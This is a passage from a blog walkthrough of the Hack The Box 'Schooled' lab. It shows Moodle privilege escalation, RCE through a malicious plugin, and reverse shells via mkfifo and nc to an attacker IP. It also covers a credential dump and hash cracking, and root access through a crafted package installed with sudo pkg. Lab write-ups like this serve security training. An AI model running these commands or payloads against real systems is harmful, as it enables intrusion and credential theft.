<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">GET</span> <span class="nn">/moodle/enrol/manual/ajax.php?mform_showmore_main=0&amp;id=5&amp;action=enrol&amp;enrolid=10&amp;sesskey=KbJYqTapFc&amp;_qf__enrol_manual_enrol_users_form=1&amp;mform_showmore_id_main=0&amp;userlist%5B%5D=24&amp;roletoassign=1&amp;startdate=4&amp;duration=</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">moodle.schooled.htb</span>
<span class="na">Accept</span><span class="p">:</span> <span class="s">*/*</span>
<span class="na">X-Requested-With</span><span class="p">:</span> <span class="s">XMLHttpRequest</span>
<span class="na">User-Agent</span><span class="p">:</span> <span class="s">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36</span>
<span class="na">Content-Type</span><span class="p">:</span> <span class="s">application/json</span>
<span class="na">Referer</span><span class="p">:</span> <span class="s">http://moodle.schooled.htb/moodle/user/index.php?id=5</span>
<span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate</span>
<span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US,en;q=0.9</span>
<span class="na">Cookie</span><span class="p">:</span> <span class="s">MoodleSession=jil2s8i0vj0gq3vojfki6e7rtq</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">close</span>
</code></pre></div></div>

<ul>
  <li>
    <p>Now as a course administrator, accessing a user’s profile, we can see the “Log in as” link, which permitted us to impersonate Lianne Carter.</p>

    <p><img src="https://i.imgur.com/zRjimbq.png" alt="HTB Schooled - Impersonating Manager in Moodle" class="align-center"></p>
  </li>
  <li>
    <p>Now as Lianne, we were supposed to be able to upload the plugin directly but, as this option isn’t enabled in their tenant, we needed to first edit the Role permissions to allow this. Navigated to Site Administration pane &gt; Users and then, under Permissions, selected Define roles.</p>

    <p><img src="https://i.imgur.com/6XmydvH.png" alt="HTB Schooled - Adjusting Role Definitions"></p>
  </li>
  <li>
    <p>Selected the <strong>Manager</strong> role and, after clicking in the “Edit” Button, intercepted the request, and appended the payload for full permissions, as shared also in the previously used script repo.</p>

    <p><img src="https://i.imgur.com/lm0NOX7.png" alt="HTB Schooled - Modifying Manager role" class="align-center"></p>

    <p><img src="https://i.imgur.com/5L28UqN.png" alt="HTB Schooled - Appending payload to Edit Request" class="align-center"></p>
  </li>
  <li>
    <p>Now, navigating to Site Administration &gt; Plugins we can see the Install Plugins option, where the rce.zip also available in the portal was available, which was uploaded with success, and allowed us to obtain RCE by calling the URL below, later changed to get a reverse shell</p>
  </li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>curl <span class="nt">-X</span> GET <span class="nt">-G</span> <span class="s1">'http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php'</span> <span class="nt">--data-urlencode</span> <span class="s1">'cmd=id'</span>
<span class="nv">uid</span><span class="o">=</span>80<span class="o">(</span>www<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>80<span class="o">(</span>www<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>80<span class="o">(</span>www<span class="o">)</span>

<span class="nv">$ </span>curl <span class="nt">-X</span> GET <span class="nt">-G</span> <span class="s1">'http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php'</span> <span class="nt">--data-urlencode</span> <span class="s1">'cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.10.10 4443 &gt;/tmp/f'</span>
</code></pre></div></div>

<h2 id="user-flag">User Flag</h2>

<p>Now with <code class="language-plaintext highlighter-rouge">www-data</code> account, started enumerating box. As usual decided to automate the task using <code class="language-plaintext highlighter-rouge">linpeas.sh</code> but found out that <code class="language-plaintext highlighter-rouge">wget</code> and <code class="language-plaintext highlighter-rouge">curl</code> were not available, so I wrote a simple <code class="language-plaintext highlighter-rouge">php</code> script that downloads a file from a webserver and then ran the script</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">"&lt;?php"</span> <span class="o">&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"</span><span class="se">\$</span><span class="s2">url = 'http://10.10.10.10/linpeas.sh';"</span> <span class="o">&gt;&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"</span><span class="se">\$</span><span class="s2">file = '/tmp/linpeas.sh';"</span> <span class="o">&gt;&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"</span><span class="se">\$</span><span class="s2">current = file_get_contents(</span><span class="se">\$</span><span class="s2">url);"</span> <span class="o">&gt;&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"file_put_contents(</span><span class="se">\$</span><span class="s2">file, </span><span class="se">\$</span><span class="s2">current);"</span> <span class="o">&gt;&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"?&gt;"</span> <span class="o">&gt;&gt;</span> wget.php

/usr/local/bin/php wget.php
</code></pre></div></div>

<p>From the execution, the following information was obtained:</p>

<ul>
  <li>Users with console and their permissions:</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jamie:*:1001:1001:Jamie:/home/jamie:/bin/sh
root:*:0:0:Charlie &amp;:/root:/bin/csh
steve:*:1002:1002:User &amp;:/home/steve:/bin/csh
</code></pre></div></div>

<ul>
  <li>Moodle Database password in file `/usr/local/www/apache24/data/moodle/config.php` :</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$CFG-&gt;dbtype    = 'mysqli';
$CFG-&gt;dbhost    = 'localhost';
$CFG-&gt;dbuser    = 'moodle';
$CFG-&gt;dbpass    = 'PlaybookMaster2020';
'dbport' =&gt; 3306,
</code></pre></div></div>

<p>Later I have found that we were only missing some paths in PATH finding <code class="language-plaintext highlighter-rouge">curl</code> installed. This was also needed to find <code class="language-plaintext highlighter-rouge">mysql</code> binary to dump the database credentials, as command line below, which was required once I wasn’t in an interactive tty</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>find / <span class="nt">-type</span> f 2&gt;/dev/null | <span class="nb">grep</span> <span class="nt">-e</span> <span class="s2">"wget$"</span> <span class="nt">-e</span> <span class="s2">"curl$"</span> <span class="nt">-e</span> <span class="s2">"mysql$"</span>
/usr/local/bin/curl
/usr/local/bin/mysql
/usr/local/share/bash-completion/completions/wget
/usr/local/share/bash-completion/completions/curl
/usr/local/share/bash-completion/completions/mysql
/usr/local/share/zsh/site-functions/_curl
/var/mail/mysql
</code></pre></div></div>

<p>Dumping the creds was possible with the command below:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>/usr/local/bin/mysql <span class="nt">-u</span> moodle <span class="nt">--password</span><span class="o">=</span>PlaybookMaster2020 <span class="nt">-e</span> <span class="s2">"use moodle; select email,username,password from mdl_user; exit"</span> | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'student.'</span>
mysql: <span class="o">[</span>Warning] Using a password on the <span class="nb">command </span>line interface can be insecure.
ERROR 1064 <span class="o">(</span>42000<span class="o">)</span> at line 1: You have an error <span class="k">in </span>your SQL syntax<span class="p">;</span> check the manual that corresponds to your MySQL server version <span class="k">for </span>the right syntax to use near <span class="s1">'exit'</span> at line 1
email   username        password
root@localhost  guest   <span class="nv">$2y$10$u8DkSWjhZnQhBk1a0g1ug</span>.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2
jamie@staff.schooled.htb        admin   <span class="nv">$2y$10$3D</span>/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW
higgins_jane@staff.schooled.htb higgins_jane    <span class="nv">$2y$10$n9SrsMwmiU</span>.egHN60RleAOauTK2XShvjsCS0tAR6m54hR1Bba6ni2
phillips_manuel@staff.schooled.htb      phillips_manuel <span class="nv">$2y$10$ZwxEs65Q0gO8rN8zpVGU2eYDvAoVmWYYEhHBPovIHr8HZGBvEYEYG</span>
carter_lianne@staff.schooled.htb        carter_lianne   <span class="nv">$2y$10$jw</span>.KgN/SIpG2MAKvW8qdiub67JD7STqIER1VeRvAH4fs/DPF57JZe
</code></pre></div></div>

<p>Based on the hashes, created a file in the format username:hash and then ran <code class="language-plaintext highlighter-rouge">john</code>, where was obtained the password for account <code class="language-plaintext highlighter-rouge">jamie</code> as below</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt accounts.txt                                                                 Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts <span class="o">(</span>bcrypt <span class="o">[</span>Blowfish 32/64 X3]<span class="o">)</span>
Cost 1 <span class="o">(</span>iteration count<span class="o">)</span> is 1024 <span class="k">for </span>all loaded hashes
Will run 2 OpenMP threads
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
<span class="o">!</span>QAZ2wsx         <span class="o">(</span>jamie<span class="o">)</span>
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session aborted
</code></pre></div></div>

<p>With these creds, connected through SSH and obtained the <code class="language-plaintext highlighter-rouge">user.txt</code> flag <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20"></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jamie@Schooled:~ <span class="nv">$ </span><span class="nb">id</span> <span class="o">&amp;&amp;</span> <span class="nb">hostname</span> <span class="o">&amp;&amp;</span> <span class="nb">cat </span>user.txt
<span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>jamie<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>jamie<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>jamie<span class="o">)</span>,0<span class="o">(</span>wheel<span class="o">)</span>
Schooled
&lt;redacted&gt;
</code></pre></div></div>

<h2 id="root-flag">Root Flag</h2>

<p>Starting the enumeration for the root flag, the first command executed was <code class="language-plaintext highlighter-rouge">sudo -l</code> as usual, which displayed the commands below</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jamie@Schooled:~ <span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
User jamie may run the following commands on Schooled:
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/sbin/pkg update
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/sbin/pkg <span class="nb">install</span> <span class="k">*</span>
</code></pre></div></div>

<p>Checking the <a href="https://gtfobins.github.io/gtfobins/pkg/">GTFOBins page</a> for <code class="language-plaintext highlighter-rouge">pkg</code> found that we might be able to install a crafted package to run a command. The below steps were used to obtain a reverse shell as root</p>

<ul>
  <li>Installed <code class="language-plaintext highlighter-rouge">fpm</code>, also available from this <a href="https://github.com/jordansissel/fpm">Github Repository</a>
</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt-get <span class="nb">install </span>ruby ruby-dev rubygems build-essential
<span class="nb">sudo </span>gem <span class="nb">install</span> <span class="nt">--no-document</span> fpm
</code></pre></div></div>

<ul>
  <li>Created a package containing the malicious payload from the attacker machine</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">TF</span><span class="o">=</span><span class="si">$(</span><span class="nb">mktemp</span> <span class="nt">-d</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s1">'export file="/tmp/zurc"'</span> <span class="o">&gt;</span> <span class="nv">$TF</span>/x.sh
<span class="nb">echo</span> <span class="s1">'rm $file;mkfifo $file;cat $file|/bin/sh -i 2&gt;&amp;1|nc 10.10.10.10 4443 &gt;$file'</span> <span class="o">&gt;&gt;</span> <span class="nv">$TF</span>/x.sh
fpm <span class="nt">-n</span> x <span class="nt">-s</span> <span class="nb">dir</span> <span class="nt">-t</span> freebsd <span class="nt">-a</span> all <span class="nt">--before-install</span> <span class="nv">$TF</span>/x.sh <span class="nv">$TF</span>
</code></pre></div></div>

<ul>
  <li>Download package and install using <code class="language-plaintext highlighter-rouge">sudo</code> based on <code class="language-plaintext highlighter-rouge">jamie</code>’s permissions</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jamie@Schooled:/tmp <span class="nv">$ </span>/usr/local/bin/curl http://10.10.10.10/x-1.0.txz <span class="nt">-o</span> x-1.0.txz
1.0.txz  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100   572  100   572    0     0   4144      0 <span class="nt">--</span>:--:-- <span class="nt">--</span>:--:-- <span class="nt">--</span>:--:--  4144
jamie@Schooled:/tmp <span class="nv">$ </span><span class="nb">sudo </span>pkg <span class="nb">install</span> <span class="nt">-y</span> <span class="nt">--no-repo-update</span> ./x-1.0.txz
pkg: Repository FreeBSD has a wrong packagesite, need to re-create database
pkg: Repository FreeBSD cannot be opened. <span class="s1">'pkg update'</span> required
Checking integrity... <span class="k">done</span> <span class="o">(</span>0 conflicting<span class="o">)</span>
The following 1 package<span class="o">(</span>s<span class="o">)</span> will be affected <span class="o">(</span>of 0 checked<span class="o">)</span>:

New packages to be INSTALLED:
        x: 1.0

Number of packages to be installed: 1
<span class="o">[</span>1/1] Installing x-1.0...
<span class="nb">rm</span>: /tmp/zurc: No such file or directory
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 4443
listening on <span class="o">[</span>any] 4443 ...
connect to <span class="o">[</span>10.10.10.10] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.234] 16349
<span class="c"># cd /root</span>
<span class="c"># cat root.txt</span>
&lt;redacted&gt;
</code></pre></div></div>

<p>I hope you guys have enjoyed it!</p>

<p>See you at the next post <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20"></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/en-US/tag/#hackthebox" class="page__taxonomy-item p-category" rel="tag">HackTheBox</a><span class="sep">, </span>
    
      <a href="/en-US/tag/#htb-linux" class="page__taxonomy-item p-category" rel="tag">HTB Linux</a><span class="sep">, </span>
    
      <a href="/en-US/tag/#htb-medium" class="page__taxonomy-item p-category" rel="tag">HTB Medium</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/en-US/categories/#walkthrough" class="page__taxonomy-item p-category" rel="tag">Walkthrough</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2021-09-11T00:00:00-03:00">September 11, 2021</time></p>

      </footer>

      <section class="page__share" id="sharelinks">
  
    <h4 class="page__share-title">Share on</h4>
  

  <!-- CUSTOM: Localized sharing links -->
  

  <a href="https://twitter.com/intent/tweet?via=zerahzurc&amp;text=Walktrough%3A+HTB+Schooled%20https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>

  <a href="whatsapp://send?text=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled" data-action="share/whatsapp/share" class="btn btn--whatsapp" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Whatsapp"><i class="fab fa-fw fa-whatsapp" aria-hidden="true"></i><span> Whatsapp</span></a>

  <a href="https://telegram.me/share/url?url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled&amp;text=Walktrough%3A+HTB+Schooled" class="btn btn--telegram" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Telegram"><i class="fab fa-fw fa-telegram-plane" aria-hidden="true"></i><span> Telegram</span></a>

  <!-- END CUSTOM: Localized sharing links -->
</section>


      
  <nav class="pagination">
    
    
      <a href="/en-US/walkthrough/2021/08/htb-knife" class="pagination--pager" title="Walktrough: HTB Knife
">Previous</a>
    
    
    
      
        <a href="/en-US/walkthrough/2021/09/htb-pit" class="pagination--pager" title="Walktrough: HTB Pit
">Next</a>
      
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Leave a comment</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h2 class="page__related-title">You may also enjoy</h2>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/TJKS5F6.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-explore" rel="permalink">Walktrough: HTB Explore
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-30T13:00:00-03:00">October 30, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/09/htb-schooled">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Explore, an easy-rated Android box from Hack The Box, created by bertolis.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/89b1SdH.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-dynstr" rel="permalink">Walktrough: HTB Dynstr
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-16T13:00:00-03:00">October 16, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          9 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/09/htb-schooled">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Dynstr, another medium-rated Linux box from Hack The Box, created by jkr.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/JkBtXmO.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-cap" rel="permalink">Walktrough: HTB Cap
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-02T13:00:00-03:00">October 2, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          6 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/09/htb-schooled">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Cap, another easy-rated Linux box from Hack The Box, created by InfoSecJack.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/pUqq7fY.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/09/htb-pit" rel="permalink">Walktrough: HTB Pit
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-25T09:00:00-03:00">September 25, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          11 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/09/htb-schooled">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Pit, another medium-rated Linux box from Hack The Box, created by polarbearer and GibParadox.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- Mermaid.js -->
<script type="module">
    import mermaid from 'https://unpkg.com/mermaid@9/dist/mermaid.esm.min.mjs';
    const config = {
        "theme": "dark", 
        "startOnLoad": true
    };
    mermaid.initialize(config);
</script>

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Follow:</strong></li>
    

    
      
        
          <li><a href="https://www.linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> Linkedin</a></li>
        
      
        
          <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i> Twitter</a></li>
        
      
        
          <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
        
      
    
    <!-- start custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
    
      <li><a href="/en-US/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
    <li><a href="https://davicruz.com/en-US/terms-and-privacy/" rel="nofollow noopener noreferrer"><i class="fas fa-user-shield" aria-hidden="true"></i> Terms of Service and Privacy Policy</a></li>
    <!--<li><a onclick="return klaro.show();"><i class="fas fa-shield-alt" aria-hidden="true"></i> Review consent</a></li>-->
    
      
        
          <li><a href="/">Disponível também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></li>
        
        
        
      
    
      
    
    <!-- end custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
  </ul>
</div>

<div class="page__footer-copyright">© 2023 Davi Cruz. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a> &amp; <a href="https://github.com/kurtsson/jekyll-multiple-languages-plugin" rel="nofollow">Multiple Languages Plugin</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- start custom analytics snippet -->

<!-- end custom analytics snippet -->





    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'davi-cruz/davi-cruz-blog');
    // CUSTOM : Utterances post mapping due to Jekyll Multilanguage
    script.setAttribute('issue-term', 'htb-schooled');
    
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  





  </body>
</html>
